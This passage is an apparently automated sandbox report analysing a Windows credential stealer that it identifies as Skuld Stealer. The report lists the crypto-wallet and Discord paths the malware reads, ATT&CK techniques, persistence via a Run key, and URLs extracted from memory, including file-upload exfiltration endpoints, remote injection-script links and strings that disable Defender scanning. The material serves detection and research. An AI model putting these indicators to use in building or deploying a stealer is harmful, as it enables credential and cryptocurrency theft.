                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                      Tries to steal communication platform credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Local\discordJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Local\discordcanaryJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Local\discordptbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Local\discorddevelopmentJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Local\discordJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Local\discordcanaryJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Local\discordptbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Local\discorddevelopmentJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\discordJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\discordcanaryJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\discordptbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\discorddevelopmentJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeDirectory queried: C:\Users\Default\DocumentsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                      Source: Yara matchFile source: 22.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: WdlA0C4PkO.exe PID: 7648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SecurityHealthSystray.exe PID: 7388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SecurityHealthSystray.exe PID: 3348, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Skuld Stealer
                      Source: Yara matchFile source: 22.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecurityHealthSystray.exe PID: 7388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SecurityHealthSystray.exe PID: 3348, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      File and Directory Permissions Modification                      		1
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services31
                      Data from Local System                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts12
                      Command and Scripting Interpreter                      		1
                      Windows Service                      		1
                      Windows Service                      		3
                      Disable or Modify Tools                      		LSASS Memory24
                      System Information Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      PowerShell                      		1
                      Registry Run Keys / Startup Folder                      		12
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		Security Account Manager231
                      Security Software Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder                      		11
                      Obfuscated Files or Information                      		NTDS2
                      Process Discovery                      		Distributed Component Object ModelInput Capture3
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Install Root Certificate                      		LSA Secrets151
                      Virtualization/Sandbox Evasion                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Software Packing                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading                      		DCSync1
                      Remote System Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Masquerading                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Modify Registry                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
                      Virtualization/Sandbox Evasion                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                      Process Injection                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577903 Sample: WdlA0C4PkO.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 45 ip-api.com 2->45 47 api.ipify.org 2->47 53 Sigma detected: Capture Wi-Fi password 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Yara detected Skuld Stealer 2->57 59 10 other signatures 2->59 9 WdlA0C4PkO.exe 2 76 2->9         started        14 SecurityHealthSystray.exe 2->14         started        16 SecurityHealthSystray.exe 2->16         started        signatures3 process4 dnsIp5 49 ip-api.com 208.95.112.1, 49708, 80 TUT-ASUS United States 9->49 51 api.ipify.org 104.26.12.205, 443, 49707 CLOUDFLARENETUS United States 9->51 41 C:\Users\user\...\SecurityHealthSystray.exe, PE32+ 9->41 dropped 43 C:\Windows\System32\drivers\etc\hosts, ASCII 9->43 dropped 63 Installs new ROOT certificates 9->63 65 Found many strings related to Crypto-Wallets (likely being stolen) 9->65 67 Uses cmd line tools excessively to alter registry or file data 9->67 73 11 other signatures 9->73 18 powershell.exe 9->18         started        21 powershell.exe 23 9->21         started        24 powershell.exe 23 9->24         started        30 12 other processes 9->30 69 Multi AV Scanner detection for dropped file 14->69 71 Machine Learning detection for dropped file 14->71 26 conhost.exe 14->26         started        28 conhost.exe 16->28         started        file6 signatures7 process8 file9 39 C:\Users\user\AppData\...\a12sgnvo.cmdline, Unicode 18->39 dropped 32 csc.exe 18->32         started        61 Loading BitLocker PowerShell Module 21->61 signatures10 process11 file12 37 C:\Users\user\AppData\Local\...\a12sgnvo.dll, PE32 32->37 dropped 35 cvtres.exe 32->35         started        process13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      WdlA0C4PkO.exe55%ReversingLabsWin64.Trojan.TMPNStealer
                      WdlA0C4PkO.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe55%ReversingLabsWin64.Trojan.TMPNStealer

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ipify.org
                      		104.26.12.205
                      		truefalse
                        		high
                        ip-api.com
                        		208.95.112.1
                        		truefalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            		high
                            http://ip-api.com/jsonfalse
                              		high
                              http://ip-api.com/line/?fields=hostingfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.1580104465.000001C995732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA36C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC94E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000012.00000002.1665126840.000001FC94C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/walletSecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.1665126840.000001FC94E1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.1536659501.000001C9858E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.microsoftpowershell.exe, 00000012.00000002.1664878909.000001FC918E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.1665126840.000001FC94E1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://go.micropowershell.exe, 00000012.00000002.1665126840.000001FC94145000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpfalse
                                                  		high
                                                  https://contoso.com/Licensepowershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/Iconpowershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.microsoft.powershell.exe, 0000000C.00000002.1604710839.000001C99DBF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.1665126840.000001FC94E1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bugzilla.moWdlA0C4PkO.exe, 00000000.00000003.2046786886.000000C0001A2000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2055924100.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2007680510.000000C0001EC000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2009215764.000000C0001EC000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1684148367.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1538095776.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.3355671817.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2075882669.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2402745424.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1539272178.000000C0001A2000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1988403621.000000C0001EA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSONSecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.1536659501.000001C9858E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1580104465.000001C995732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA36C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC94E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://discord.com/api/v9/users/SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpfalse
                                                                      		high
                                                                      https://oneget.orgXpowershell.exe, 00000012.00000002.1665126840.000001FC94C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js1157920892103562487626SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpfalse
                                                                          		high
                                                                          https://aka.ms/pscore68powershell.exe, 0000000C.00000002.1536659501.000001C9856C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC93511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://avatars.githubusercontent.com/u/145487845?v=4sqlite:SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpfalse
                                                                              		high
                                                                              https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%sSecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1536659501.000001C9856C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC93511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://oneget.orgpowershell.exe, 00000012.00000002.1665126840.000001FC94C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    208.95.112.1
                                                                                    		ip-api.comUnited States
                                                                                    		53334TUT-ASUSfalse
                                                                                    104.26.12.205
                                                                                    		api.ipify.orgUnited States
                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1577903
                                                                                    Start date and time:2024-12-18 21:24:05 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 9m 54s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:29
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:WdlA0C4PkO.exe
                                                                                    renamed because original name is a hash value
                                                                                    Original Sample Name:2b344d8644f0d502c4c8370ef8674a51.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.adwa.spyw.expl.evad.winEXE@38/25@2/2
                                                                                    EGA Information:Failed
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 11
                                                                                    • Number of non-executed functions: 6
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Override analysis time to 240s for sample files taking high CPU consumption

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7668 because it is empty
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • VT rate limit hit for: WdlA0C4PkO.exe

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    15:25:04API Interceptor6x Sleep call for process: WMIC.exe modified
                                                                                    15:25:09API Interceptor76x Sleep call for process: powershell.exe modified
                                                                                    20:25:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                    20:25:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    208.95.112.1xt.exeGet hashmaliciousXWormBrowse
                                                                                    • ip-api.com/line/?fields=hosting
                                                                                    roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                    • ip-api.com/json
                                                                                    roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                    • ip-api.com/json
                                                                                    random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                    • ip-api.com/json
                                                                                    x.ps1Get hashmaliciousQuasarBrowse
                                                                                    • ip-api.com/json/
                                                                                    Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                    • ip-api.com/json/
                                                                                    Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                    • ip-api.com/json/
                                                                                    Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                    • ip-api.com/json/
                                                                                    Creal.exeGet hashmaliciousBlackshadesBrowse
                                                                                    • ip-api.com/json/
                                                                                    factura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • ip-api.com/line/?fields=hosting

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    ip-api.comxt.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                    • 208.95.112.1
                                                                                    x.ps1Get hashmaliciousQuasarBrowse
                                                                                    • 208.95.112.1
                                                                                    https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=costGet hashmaliciousUnknownBrowse
                                                                                    • 208.95.112.2
                                                                                    Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                    • 208.95.112.1
                                                                                    Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                    • 208.95.112.1
                                                                                    Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                    • 208.95.112.1
                                                                                    Creal.exeGet hashmaliciousBlackshadesBrowse
                                                                                    • 208.95.112.1
                                                                                    api.ipify.orgcali.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.26.13.205
                                                                                    Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                    • 104.26.13.205
                                                                                    PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                    • 104.26.12.205
                                                                                    Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 172.67.74.152
                                                                                    winws1.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.12.205
                                                                                    KASHI SHIP PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 172.67.74.152
                                                                                    PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                    • 104.26.13.205
                                                                                    rDOC24INV0616.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 172.67.74.152
                                                                                    https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 172.67.74.152
                                                                                    PqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                                                                                    • 104.26.13.205

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUShttps://ine95l4am7-secondary.z5.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                                                    • 172.67.218.206
                                                                                    rK0CtrtVrl.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                    • 104.21.64.80
                                                                                    https://muse.krazzykriss.com/BbWGOn6X5VNhl7wIMoGqGHbc4hg/hLYIPI2xCimX9Bg/l+JXfZf7Get hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    NHEXQatKdE.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.179.109
                                                                                    CefJcYwgWs.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                    • 104.21.64.80
                                                                                    tdMnK5A1pe.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.64.80
                                                                                    3DI3mOIlxE.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                    • 104.21.64.80
                                                                                    pPizCGDvrx.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.179.109
                                                                                    tasktow.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.1.82
                                                                                    https://www.asda.com@hnvs.xyz/asda-christmas-prizesGet hashmaliciousUnknownBrowse
                                                                                    • 172.66.47.201
                                                                                    TUT-ASUSxt.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                    • 208.95.112.1
                                                                                    x.ps1Get hashmaliciousQuasarBrowse
                                                                                    • 208.95.112.1
                                                                                    https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=costGet hashmaliciousUnknownBrowse
                                                                                    • 208.95.112.2
                                                                                    Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                    • 208.95.112.1
                                                                                    Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                    • 208.95.112.1
                                                                                    Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                    • 208.95.112.1
